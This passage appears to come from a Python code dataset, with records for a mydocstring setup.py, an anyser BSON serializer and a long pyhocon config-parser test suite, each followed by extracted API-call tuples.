np\n'), ((12691, 12732), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (['value'], {}), '(value)\n', (12725, 12732), False, 'import werkzeug\n'), ((16481, 16517), 'json.loads', 'json.loads', (["form.form['metadata'][0]"], {}), "(form.form['metadata'][0])\n", (16491, 16517), False, 'import json\n'), ((16640, 16673), 'json.loads', 'json.loads', (["form.form['metadata']"], {}), "(form.form['metadata'])\n", (16650, 16673), False, 'import json\n'), ((16799, 16809), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (16804, 16809), False, 'from flask import Flask, request, make_response, abort\n'), ((16906, 16917), 'time.time', 'time.time', ([], {}), '()\n', (16915, 16917), False, 'import time\n'), ((20165, 20211), 'json.dumps', 'json.dumps', (['next_action'], {'cls': 'NumpyAwareEncoder'}), '(next_action, cls=NumpyAwareEncoder)\n', (20175, 20211), False, 'import json\n'), ((7629, 7695), 'numpy.logical_or', 'np.logical_or', (['self.class_masks[cls]', 'unique_masks[color_ind, ...]'], {}), '(self.class_masks[cls], unique_masks[color_ind, ...])\n', (7642, 7695), True, 'import numpy as np\n'), ((7964, 7979), 'numpy.float32', 'np.float32', (['(256)'], {}), '(256)\n', (7974, 7979), True, 'import numpy as np\n'), ((16383, 16401), 'flask.request.get_data', 'request.get_data', ([], {}), '()\n', (16399, 16401), False, 'from flask import Flask, request, make_response, abort\n'), ((7229, 7255), 'numpy.abs', 'np.abs', (['(unique_ids - color)'], {}), '(unique_ids - color)\n', (7235, 7255), True, 'import numpy as np\n'), ((14978, 15003), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (14993, 15003), False, 'import os\n')]
ooreilly/mydocstring
setup.py
077cebfb86575914d343bd3291b9e6c5e8beef94
from setuptools import setup setup(name='mydocstring', version='0.2.7', description="""A tool for extracting and converting Google-style docstrings to plain-text, markdown, and JSON.""", url='http://github.com/ooreilly/mydocstring', author="Ossian O'Reilly", license='MIT', packages=['mydocstring'], install_requires=['mako', 'docopt'], entry_points = { 'console_scripts': [ 'mydocstring=mydocstring.docstring:main', ],}, package_data={'mydocstring': ['templates/google_docstring.md']}, zip_safe=False)
[((31, 531), 'setuptools.setup', 'setup', ([], {'name': '"""mydocstring"""', 'version': '"""0.2.7"""', 'description': '"""A tool for extracting and converting Google-style docstrings to\n plain-text, markdown, and JSON."""', 'url': '"""http://github.com/ooreilly/mydocstring"""', 'author': '"""Ossian O\'Reilly"""', 'license': '"""MIT"""', 'packages': "['mydocstring']", 'install_requires': "['mako', 'docopt']", 'entry_points': "{'console_scripts': ['mydocstring=mydocstring.docstring:main']}", 'package_data': "{'mydocstring': ['templates/google_docstring.md']}", 'zip_safe': '(False)'}), '(name=\'mydocstring\', version=\'0.2.7\', description=\n """A tool for extracting and converting Google-style docstrings to\n plain-text, markdown, and JSON."""\n , url=\'http://github.com/ooreilly/mydocstring\', author=\n "Ossian O\'Reilly", license=\'MIT\', packages=[\'mydocstring\'],\n install_requires=[\'mako\', \'docopt\'], entry_points={\'console_scripts\': [\n \'mydocstring=mydocstring.docstring:main\']}, package_data={\'mydocstring\':\n [\'templates/google_docstring.md\']}, zip_safe=False)\n', (36, 531), False, 'from setuptools import setup\n')]
Cologler/anyser-python
anyser/impls/bson.py
52afa0a62003adcfe269f47d81863e00381d8ff9
# -*- coding: utf-8 -*- # # Copyright (c) 2020~2999 - Cologler <[email protected]> # ---------- # # ---------- import bson import struct from ..err import SerializeError from ..abc import * from ..core import register_format @register_format('bson', '.bson') class BsonSerializer(ISerializer): format_name = 'bson' def loadb(self, b: bytes, options: dict) -> Any: kwargs = {} kwargs.update(Options.pop_origin_kwargs(options)) self.check_options(options) try: return bson.loads(b, **kwargs) except Exception as e: raise SerializeError(e) def dumpb(self, obj, options: dict) -> bytes: kwargs = {} kwargs.update(Options.pop_origin_kwargs(options)) self.check_options(options) try: return bson.dumps(obj, **kwargs) except Exception as e: raise SerializeError(e)
[((522, 545), 'bson.loads', 'bson.loads', (['b'], {}), '(b, **kwargs)\n', (532, 545), False, 'import bson\n'), ((810, 835), 'bson.dumps', 'bson.dumps', (['obj'], {}), '(obj, **kwargs)\n', (820, 835), False, 'import bson\n')]
KevinMFong/pyhocon
tests/test_config_parser.py
091830001f2d44f91f0f8281fb119c87fd1f6660
# -*- encoding: utf-8 -*- import json import os import shutil import tempfile from collections import OrderedDict from datetime import timedelta from pyparsing import ParseBaseException, ParseException, ParseSyntaxException import mock import pytest from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree) from pyhocon.exceptions import (ConfigException, ConfigMissingException, ConfigWrongTypeException) try: from dateutil.relativedelta import relativedelta as period except Exception: from datetime import timedelta as period class TestConfigParser(object): def test_parse_simple_value(self): config = ConfigFactory.parse_string( """t = { c = 5 "d" = true e.y = { f: 7 g: "hey dude!" h: hey man i = \"\"\" "first line" "second" line \"\"\" } j = [1, 2, 3] u = 192.168.1.3/32 g = null } """ ) assert config.get_string('t.c') == '5' assert config.get_int('t.c') == 5 assert config.get_float('t.c') == 5.0 assert config.get('t.e.y.f') == 7 assert config.get('t.e.y.g') == 'hey dude!' assert config.get('t.e.y.h') == 'hey man' assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', ''] assert config.get_bool('t.d') is True assert config.get_int('t.e.y.f') == 7 assert config.get('t.j') == [1, 2, 3] assert config.get('t.u') == '192.168.1.3/32' assert config.get_int('t.g') is None assert config.get_float('t.g') is None assert config.get_string('t.g') is None assert config.get_bool('t.g') is None assert config.get_list('t.g') is None assert config.get_config('t.g') is None @pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&']) def test_fail_parse_forbidden_characters(self, forbidden_char): with pytest.raises(ParseBaseException): ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char)) @pytest.mark.parametrize('forbidden_char', ['$', '"']) def test_fail_parse_forbidden_characters_in_context(self, forbidden_char): with pytest.raises(ParseException): ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char)) @pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&']) def test_parse_forbidden_characters_quoted(self, forbidden_char): value = "hey man{}".format(forbidden_char) config = ConfigFactory.parse_string('a: "{}"'.format(value)) assert config.get_string("a") == value def test_parse_with_enclosing_brace(self): config = ConfigFactory.parse_string( """ { a: { b: 5 } } """ ) assert config.get_string('a.b') == '5' @pytest.mark.parametrize('data_set', [ ('a: 1 minutes', period(minutes=1)), ('a: 1minutes', period(minutes=1)), ('a: 2 minute', period(minutes=2)), ('a: 3 m', period(minutes=3)), ('a: 3m', period(minutes=3)), ('a: 3 min', '3 min'), ('a: 4 seconds', period(seconds=4)), ('a: 5 second', period(seconds=5)), ('a: 6 s', period(seconds=6)), ('a: 6 sec', '6 sec'), ('a: 7 hours', period(hours=7)), ('a: 8 hour', period(hours=8)), ('a: 9 h', period(hours=9)), ('a: 10 weeks', period(weeks=10)), ('a: 11 week', period(weeks=11)), ('a: 12 w', period(weeks=12)), ('a: 10 days', period(days=10)), ('a: 11 day', period(days=11)), ('a: 12 d', period(days=12)), ('a: 110 microseconds', period(microseconds=110)), ('a: 111 microsecond', period(microseconds=111)), ('a: 112 micros', period(microseconds=112)), ('a: 113 micro', period(microseconds=113)), ('a: 114 us', period(microseconds=114)), ('a: 110 milliseconds', timedelta(milliseconds=110)), ('a: 111 millisecond', timedelta(milliseconds=111)), ('a: 112 millis', timedelta(milliseconds=112)), ('a: 113 milli', timedelta(milliseconds=113)), ('a: 114 ms', timedelta(milliseconds=114)), ('a: 110 nanoseconds', period(microseconds=0)), ('a: 11000 nanoseconds', period(microseconds=11)), ('a: 1110000 nanosecond', period(microseconds=1110)), ('a: 1120000 nanos', period(microseconds=1120)), ('a: 1130000 nano', period(microseconds=1130)), ('a: 1140000 ns', period(microseconds=1140)), ]) def test_parse_string_with_duration(self, data_set): config = ConfigFactory.parse_string(data_set[0]) assert config['a'] == data_set[1] def test_parse_string_with_duration_with_long_unit_name(self): config = ConfigFactory.parse_string( """ a: foo b: 10 weeks c: bar """ ) assert config['b'] == period(weeks=10) def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self): config = ConfigFactory.parse_string( """ a: foo b: [a, 1, 10 weeks, 5 minutes,] c: bar """ ) assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)] def test_parse_with_enclosing_square_bracket(self): config = ConfigFactory.parse_string("[1, 2, 3]") assert config == [1, 2, 3] def test_quoted_key_with_dots(self): config = ConfigFactory.parse_string( """ "a.b.c.d": 3 t { "d": { "c": 5 } } k { "b.f.d": 7 } """ ) assert config['"a.b.c.d"'] == 3 assert config['t.d.c'] == 5 assert config['k."b.f.d"'] == 7 def test_dotted_notation_merge(self): config = ConfigFactory.parse_string( """ a { b = foo c = bar } a.c = ${a.b}" "${a.b} a.d = baz """ ) assert config['a.b'] == "foo" assert config['a.c'] == "foo foo" assert config['a.d'] == "baz" def test_comma_to_separate_expr(self): config = ConfigFactory.parse_string( """ a=1, b="abc", c=the man, d=woof, a-b-c-d=test, a b c d=test2, "a b c d e"=test3 """ ) assert config.get('a') == 1 assert config.get('b') == 'abc' assert config.get('c') == 'the man' assert config.get('d') == 'woof' assert config.get('a-b-c-d') == 'test' assert config.get('a b c d') == 'test2' assert config.get('a b c d e') == 'test3' def test_dict_merge(self): config = ConfigFactory.parse_string( """ a { d { g.h.j.u: 5 g { h.d: 4 } g.h.k: f d } h.i.m = 7 h.i { d: 5 } h.i { e:65 } } """) expected_result = { "a": { "d": { "g": { "h": { "j": { "u": 5 }, "d": 4, "k": "f d" } } }, "h": { "i": { "m": 7, "d": 5, "e": 65 } } } } assert expected_result == config def test_parse_with_comments(self): config = ConfigFactory.parse_string( """ // comment 1 # comment 2 { c = test // comment 0 g = 6 test # comment 0 # comment 3 a: { # comment 4 b: test, # comment 5 } # comment 6 t = [1, # comment 7 2, # comment 8 3, # comment 9 ] } # comment 10 // comment 11 // comment 12 """ ) assert config.get('c') == 'test' assert config.get('g') == '6 test' assert config.get('a.b') == 'test' assert config.get_string('a.b') == 'test' assert config.get('t') == [1, 2, 3] def test_missing_config(self): config = ConfigFactory.parse_string( """ a = 5 """ ) # b is not set so show raise an exception with pytest.raises(ConfigMissingException): config.get('b') def test_parse_null(self): config = ConfigFactory.parse_string( """ a = null b = [null] """ ) assert config.get('a') is None assert config.get('b')[0] is None def test_parse_override(self): config = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } a.b { c = 7 d = 8 } } """ ) assert config.get('a.b.c') == 7 assert config.get('a.b.d') == 8 def test_concat_dict(self): config = ConfigFactory.parse_string( """ a: {b: 1} a: {c: 2} b: {c: 3} {d: 4} { c: 5 } """ ) assert config.get('a.b') == 1 assert config.get('a.c') == 2 assert config.get('b.c') == 5 assert config.get('b.d') == 4 def test_concat_string(self): config = ConfigFactory.parse_string( """ a = a b c b = 5 b c = b 7 """ ) assert config.get('a') == 'a b c' assert config.get('b') == '5 b' assert config.get('c') == 'b 7' def test_concat_list(self): config = ConfigFactory.parse_string( """ a = [1, 2] [3, 4] [ 5, 6 ] """ ) assert config.get('a') == [1, 2, 3, 4, 5, 6] assert config.get_list('a') == [1, 2, 3, 4, 5, 6] def test_bad_concat(self): ConfigFactory.parse_string('a = 45\n') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = [4] "4"') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = "4" [5]') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = {b: 5} "4"') def test_string_substitutions(self): config1 = ConfigFactory.parse_string( """ { a: { b: { c = str e = "str " } } d = ${a.b.c} f = ${a.b.e} } """ ) assert config1.get('a.b.c') == 'str' assert config1.get('d') == 'str' assert config1.get('f') == 'str ' config2 = ConfigFactory.parse_string( """ { a: { b: { c = str e = "str " } } d = test ${a.b.c} f = test ${a.b.e} } """ ) assert config2.get('a.b.c') == 'str' assert config2.get('d') == 'test str' assert config2.get('f') == 'test str ' config3 = ConfigFactory.parse_string( u""" { a: { b: { c = str e = "str " } } d = test ${a.b.c} me f = test ${a.b.e} me } """ ) assert config3.get('a.b.c') == 'str' assert config3.get('d') == 'test str me' assert config3.get('f') == 'test str me' def test_string_substitutions_with_no_space(self): config = ConfigFactory.parse_string( """ app.heap_size = 128 app.java_opts = [ -Xms${app.heap_size}m -Xmx${app.heap_size}m ] """ ) assert config.get('app.java_opts') == [ '-Xms128m', '-Xmx128m' ] def test_int_substitutions(self): config1 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = ${a.b.c} } """ ) assert config1.get('a.b.c') == 5 assert config1.get('d') == 5 config2 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = test ${a.b.c} } """ ) assert config2.get('a.b.c') == 5 assert config2.get('d') == 'test 5' config3 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = test ${a.b.c} me } """ ) assert config3.get('a.b.c') == 5 assert config3.get('d') == 'test 5 me' def test_cascade_string_substitutions(self): config = ConfigFactory.parse_string( """ { a: { b: { c = ${e} } } d = test ${a.b.c} me e = 7 } """ ) assert config.get('a.b.c') == 7 assert config.get('d') == 'test 7 me' def test_multiple_substitutions(self): config = ConfigFactory.parse_string( """ a = 5 b=${a}${a} c=${a} ${a} """ ) assert config == { 'a': 5, 'b': '55', 'c': '5 5' } def test_dict_substitutions(self): config = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = ${data-center-generic} {name = "east"} """ ) assert config.get('data-center-east.cluster-size') == 6 assert config.get('data-center-east.name') == 'east' config2 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = {name = "east"} ${data-center-generic} """ ) assert config2.get('data-center-east.cluster-size') == 6 assert config2.get('data-center-east.name') == 'east' config3 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" } """ ) assert config3.get('data-center-east.cluster-size') == 9 assert config3.get('data-center-east.name') == 'east' assert config3.get('data-center-east.opts') == '-Xmx4g' config4 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = {name = "east"} ${data-center-generic} data-center-east-prod = ${data-center-east} {tmpDir=/tmp} """ ) assert config4.get('data-center-east.cluster-size') == 6 assert config4.get('data-center-east.name') == 'east' assert config4.get('data-center-east-prod.cluster-size') == 6 assert config4.get('data-center-east-prod.tmpDir') == '/tmp' config5 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = ${data-center-generic} data-center-east = { name = "east" } """ ) assert config5['data-center-east'] == { 'name': 'east', 'cluster-size': 6 } config6 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = { name = "east" } data-center-east = ${data-center-generic} """ ) assert config6['data-center-east'] == { 'name': 'east', 'cluster-size': 6 } def test_dos_chars_with_unquoted_string_noeol(self): config = ConfigFactory.parse_string("foo = bar") assert config['foo'] == 'bar' def test_dos_chars_with_quoted_string_noeol(self): config = ConfigFactory.parse_string('foo = "5"') assert config['foo'] == '5' def test_dos_chars_with_triple_quoted_string_noeol(self): config = ConfigFactory.parse_string('foo = """5"""') assert config['foo'] == '5' def test_dos_chars_with_int_noeol(self): config = ConfigFactory.parse_string("foo = 5") assert config['foo'] == 5 def test_dos_chars_with_float_noeol(self): config = ConfigFactory.parse_string("foo = 5.0") assert config['foo'] == 5.0 def test_list_substitutions(self): config = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = ${common_modules} [java] """ ) assert config.get('host_modules') == ['php', 'python', 'java'] config2 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} """ ) assert config2.get('host_modules') == ['java', 'php', 'python'] config3 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} [perl] """ ) assert config3.get('common_modules') == ['php', 'python'] assert config3.get('host_modules') == ['java', 'php', 'python', 'perl'] config4 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} [perl] full_modules = ${host_modules} [c, go] """ ) assert config4.get('common_modules') == ['php', 'python'] assert config4.get('host_modules') == ['java', 'php', 'python', 'perl'] assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go'] def test_list_element_substitution(self): config = ConfigFactory.parse_string( """ main_language = php languages = [java, ${main_language}] """ ) assert config.get('languages') == ['java', 'php'] def test_substitution_list_with_append(self): config = ConfigFactory.parse_string( """ application.foo = 128mm application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}] application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"] """) assert config["application.large-jvm-opts"] == [ '-XX:+UseParNewGC', '-Xm16g', '128mm' ] assert config["application.large-jvm-opts2"] == [ '-Xm16g', '128mm', '-XX:+UseParNewGC', ] def test_substitution_list_with_append_substitution(self): config = ConfigFactory.parse_string( """ application.foo = 128mm application.default-jvm-opts = ["-XX:+UseParNewGC"] application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}] application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts} """) assert config["application.large-jvm-opts"] == [ '-XX:+UseParNewGC', '-Xm16g', '128mm' ] assert config["application.large-jvm-opts2"] == [ '-Xm16g', '128mm', '-XX:+UseParNewGC' ] def test_non_existent_substitution(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = ${non_existent} """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = abc ${non_existent} """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = ${non_existent} abc """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = abc ${non_existent} def """ ) def test_non_compatible_substitution(self): with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = 55 ${common_modules} """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = ${common_modules} 55 """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} bb """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = ${common_modules} aa """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} bb """ ) def test_self_ref_substitution_array(self): config = ConfigFactory.parse_string( """ x = [1,2] x = ${x} [3,4] x = [-1, 0] ${x} [5, 6] x = [-3, -2] ${x} """ ) assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6] def test_self_append_array(self): config = ConfigFactory.parse_string( """ x = [1,2] x += [3,4] """ ) assert config.get("x") == [1, 2, 3, 4] def test_self_append_string(self): ''' Should be equivalent to x = abc x = ${?x} def ''' config = ConfigFactory.parse_string( """ x = abc x += def """ ) assert config.get("x") == "abc def" def test_self_append_non_existent_string(self): ''' Should be equivalent to x = ${?x} def ''' config = ConfigFactory.parse_string( """ x += def """ ) assert config.get("x") == " def" def test_self_append_nonexistent_array(self): config = ConfigFactory.parse_string( """ x += [1,2] """ ) assert config.get("x") == [1, 2] def test_self_append_object(self): config = ConfigFactory.parse_string( """ x = {a: 1} x += {b: 2} """ ) assert config.get("x") == {'a': 1, 'b': 2} def test_self_append_nonexistent_object(self): config = ConfigFactory.parse_string( """ x += {a: 1} """ ) assert config.get("x") == {'a': 1} def test_self_ref_substitution_array_to_dict(self): config = ConfigFactory.parse_string( """ x = [1,2] x = {x: [3,4]} x = {y: [5,6]} x = {z: ${x}} """ ) assert config.get("x.x") == [3, 4] assert config.get("x.y") == [5, 6] assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]} def test_self_ref_substitiotion_dict_in_array(self): config = ConfigFactory.parse_string( """ x = {x: [3,4]} x = [${x}, 2, 3] """ ) (one, two, three) = config.get("x") assert one == {'x': [3, 4]} assert two == 2 assert three == 3 def test_self_ref_substitution_dict_path(self): config = ConfigFactory.parse_string( """ x = {y: {z: 1}} x = ${x.y} """ ) assert config.get("x.y") == {'z': 1} assert config.get("x.z") == 1 assert set(config.get("x").keys()) == set(['y', 'z']) def test_self_ref_substitution_dict_path_hide(self): config = ConfigFactory.parse_string( """ x = {y: {y: 1}} x = ${x.y} """ ) assert config.get("x.y") == 1 assert set(config.get("x").keys()) == set(['y']) def test_self_ref_substitution_dict_recurse(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} """ ) def test_self_ref_substitution_dict_recurse2(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} x = ${x} """ ) def test_self_ref_substitution_dict_merge(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ foo : { a : { c : 1 } } foo : ${foo.a} foo : { a : 2 } """ ) assert config.get('foo') == {'a': 2, 'c': 1} assert set(config.keys()) == set(['foo']) def test_self_ref_substitution_dict_otherfield(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ bar : { foo : 42, baz : ${bar.foo} } """ ) assert config.get("bar") == {'foo': 42, 'baz': 42} assert set(config.keys()) == set(['bar']) def test_self_ref_substitution_dict_otherfield_merged_in(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ bar : { foo : 42, baz : ${bar.foo} } bar : { foo : 43 } """ ) assert config.get("bar") == {'foo': 43, 'baz': 43} assert set(config.keys()) == set(['bar']) def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ // bar.a should end up as 4 bar : { a : ${foo.d}, b : 1 } bar.b = 3 // foo.c should end up as 3 foo : { c : ${bar.b}, d : 2 } foo.d = 4 """ ) assert config.get("bar") == {'a': 4, 'b': 3} assert config.get("foo") == {'c': 3, 'd': 4} assert set(config.keys()) == set(['bar', 'foo']) def test_self_ref_substitution_string_opt_concat(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ a = ${?a}foo """ ) assert config.get("a") == 'foo' assert set(config.keys()) == set(['a']) def test_self_ref_substitution_dict_recurse_part(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} {y: 1} x = ${x.y} """ ) def test_self_ref_substitution_object(self): config = ConfigFactory.parse_string( """ x = {a: 1, b: 2} x = ${x} {c: 3} x = {z: 0} ${x} x = {y: -1} ${x} {d: 4} """ ) assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4} def test_self_ref_child(self): config = ConfigFactory.parse_string( """ a.b = 3 a.b = ${a.b} a.b = ${a.b} a.c = [1,2] a.c = ${a.c} a.d = {foo: bar} a.d = ${a.d} """ ) assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}} def test_concat_multi_line_string(self): config = ConfigFactory.parse_string( """ common_modules = perl \ java \ python """ ) assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python'] def test_concat_multi_line_list(self): config = ConfigFactory.parse_string( """ common_modules = [perl] \ [java] \ [python] """ ) assert config['common_modules'] == ['perl', 'java', 'python'] def test_concat_multi_line_dict(self): config = ConfigFactory.parse_string( """ common_modules = {a:perl} \ {b:java} \ {c:python} """ ) assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'} def test_parse_URL_from_samples(self): config = ConfigFactory.parse_URL("file:samples/aws.conf") assert config.get('data-center-generic.cluster-size') == 6 assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g'] def test_parse_URL_from_invalid(self): config = ConfigFactory.parse_URL("https://nosuchurl") assert config == [] def test_include_dict_from_samples(self): config = ConfigFactory.parse_file("samples/animals.conf") assert config.get('cat.garfield.say') == 'meow' assert config.get('dog.mutt.hates.garfield.say') == 'meow' def test_include_glob_dict_from_samples(self): config = ConfigFactory.parse_file("samples/all_animals.conf") assert config.get('animals.garfield.say') == 'meow' assert config.get('animals.mutt.hates.garfield.say') == 'meow' def test_include_glob_list_from_samples(self): config = ConfigFactory.parse_file("samples/all_bars.conf") bars = config.get_list('bars') assert len(bars) == 10 names = {bar['name'] for bar in bars} types = {bar['type'] for bar in bars if 'type' in bar} print(types, '(((((') assert 'Bloody Mary' in names assert 'Homer\'s favorite coffee' in names assert 'milk' in types def test_list_of_dicts(self): config = ConfigFactory.parse_string( """ a: [ {a: 1, b: 2}, {a: 3, c: 4}, ] """ ) assert config['a'] == [ {'a': 1, 'b': 2}, {'a': 3, 'c': 4} ] def test_list_of_lists(self): config = ConfigFactory.parse_string( """ a: [ [1, 2] [3, 4] ] """ ) assert config['a'] == [ [1, 2], [3, 4] ] def test_list_of_dicts_with_merge(self): config = ConfigFactory.parse_string( """ b = {f: 4} a: [ ${b} {a: 1, b: 2}, {a: 3, c: 4} ${b}, {a: 3} ${b} {c: 6}, ] """ ) assert config['a'] == [ {'a': 1, 'b': 2, 'f': 4}, {'a': 3, 'c': 4, 'f': 4}, {'a': 3, 'c': 6, 'f': 4} ] def test_list_of_lists_with_merge(self): config = ConfigFactory.parse_string( """ b = [5, 6] a: [ ${b} [1, 2] [3, 4] ${b} [1, 2] ${b} [7, 8] ] """ ) assert config['a'] == [ [5, 6, 1, 2], [3, 4, 5, 6], [1, 2, 5, 6, 7, 8] ] def test_invalid_assignment(self): with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string('common_modules [perl]') with pytest.raises(ParseException): ConfigFactory.parse_string('common_modules {} {perl: 1}') with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string( """ a = {f: 5} common_modules ${a} {perl: 1} """) def test_invalid_dict(self): with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string( """ a = { f: 5 g } """) with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string('a = {g}') def test_include_file(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('[1, 2]') fdin.flush() config1 = ConfigFactory.parse_string( """ a: [ include "{tmp_file}" ] """.format(tmp_file=fdin.name) ) assert config1['a'] == [1, 2] config2 = ConfigFactory.parse_string( """ a: [ include file("{tmp_file}") ] """.format(tmp_file=fdin.name) ) assert config2['a'] == [1, 2] config3 = ConfigFactory.parse_string( """ a: [ include url("file://{tmp_file}") ] """.format(tmp_file=fdin.name) ) assert config3['a'] == [1, 2] def test_include_missing_file(self): config1 = ConfigFactory.parse_string( """ a: [ include "dummy.txt" 3 4 ] """ ) assert config1['a'] == [3, 4] def test_include_required_file(self): config = ConfigFactory.parse_string( """ a { include required("samples/animals.d/cat.conf") t = 2 } """ ) expected = { 'a': { 'garfield': { 'say': 'meow' }, 't': 2 } } assert expected == config config2 = ConfigFactory.parse_string( """ a { include required(file("samples/animals.d/cat.conf")) t = 2 } """ ) assert expected == config2 def test_include_missing_required_file(self): with pytest.raises(IOError): ConfigFactory.parse_string( """ a: [ include required("dummy.txt") 3 4 ] """ ) def test_resolve_package_path(self): path = ConfigParser.resolve_package_path("pyhocon:config_parser.py") assert os.path.exists(path) def test_resolve_package_path_format(self): with pytest.raises(ValueError): ConfigParser.resolve_package_path("pyhocon/config_parser.py") def test_resolve_package_path_missing(self): with pytest.raises(ImportError): ConfigParser.resolve_package_path("non_existent_module:foo.py") def test_include_package_file(self, monkeypatch): temp_dir = tempfile.mkdtemp() try: module_dir = os.path.join(temp_dir, 'my_module') module_conf = os.path.join(module_dir, 'my.conf') # create the module folder and necessary files (__init__ and config) os.mkdir(module_dir) open(os.path.join(module_dir, '__init__.py'), 'a').close() with open(module_conf, 'w') as fdin: fdin.write("{c: 3}") # add the temp dir to sys.path so that 'my_module' can be discovered monkeypatch.syspath_prepend(temp_dir) # load the config and include the other config file from 'my_module' config = ConfigFactory.parse_string( """ a: 1 b: 2 include package("my_module:my.conf") """ ) # check that the contents of both config files are available assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3} finally: shutil.rmtree(temp_dir, ignore_errors=True) def test_include_dict(self): expected_res = { 'a': 1, 'b': 2, 'c': 3, 'd': 4 } with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('{a: 1, b: 2}') fdin.flush() config1 = ConfigFactory.parse_string( """ a: {{ include "{tmp_file}" c: 3 d: 4 }} """.format(tmp_file=fdin.name) ) assert config1['a'] == expected_res config2 = ConfigFactory.parse_string( """ a: {{ c: 3 d: 4 include "{tmp_file}" }} """.format(tmp_file=fdin.name) ) assert config2['a'] == expected_res config3 = ConfigFactory.parse_string( """ a: {{ c: 3 include "{tmp_file}" d: 4 }} """.format(tmp_file=fdin.name) ) assert config3['a'] == expected_res def test_include_substitution(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('y = ${x}') fdin.flush() config = ConfigFactory.parse_string( """ include "{tmp_file}" x = 42 """.format(tmp_file=fdin.name) ) assert config['x'] == 42 assert config['y'] == 42 @pytest.mark.xfail def test_include_substitution2(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('{ x : 10, y : ${x} }') fdin.flush() config = ConfigFactory.parse_string( """ { a : { include """ + '"' + fdin.name + """" } a : { x : 42 } } """ ) assert config['a']['x'] == 42 assert config['a']['y'] == 42 def test_var_with_include_keyword(self): config = ConfigFactory.parse_string( """ include-database=true """) assert config == { 'include-database': True } def test_substitution_override(self): config = ConfigFactory.parse_string( """ database { host = localhost port = 5432 user = people name = peopledb pass = peoplepass } user=test_user pass=test_pass database { user = ${user} pass = ${pass} } """) assert config['database.user'] == 'test_user' assert 